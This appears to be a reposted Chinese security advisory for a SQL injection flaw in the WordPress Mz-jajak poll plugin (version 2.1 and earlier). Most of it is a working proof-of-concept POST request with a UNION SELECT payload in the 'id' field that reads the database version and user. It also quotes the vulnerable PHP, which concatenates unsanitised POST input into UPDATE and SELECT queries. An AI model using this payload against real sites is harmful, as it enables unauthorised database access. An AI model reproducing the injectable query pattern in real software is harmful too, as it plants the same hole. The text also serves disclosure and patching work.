标题: WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability 作者: StRoNiX www.2cto.com hacker@hotmail.rs 下载 地址: http://downloads.wordpress.org/plugin/mz-jajak.zip 影响版本: 2.1 (已测) --------------- 测试证明 (POST data) --------------- POST /index.php HTTP/1.1 User-Agent: Mozilla Host: example.com Accept: */* Referer: http:// www.2cto.com /?page_id=9 Connection: Keep-Alive Content-Length: 111 Content-Type: application/x-www-form-urlencoded answer=1&formvote=Y&id=1 AND 1=0 UNION ALL SELECT 1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15--+&x=10&y=12 --------------- 缺陷相关代码 --------------- $id=$_POST['id']; ... $query = $wpdb->query("UPDATE " . $table_name . " SET ".$answert."=".$answert."+1 WHERE id=".$id); } $rows = $wpdb->get_results("SELECT * FROM " . $table_name . " WHERE id=".$id); Thanks, ~StRoNiX
查看更多关于WordPress插件Mz-jajak <= 2.1 SQL注射及修复 - 网站安的详细内容...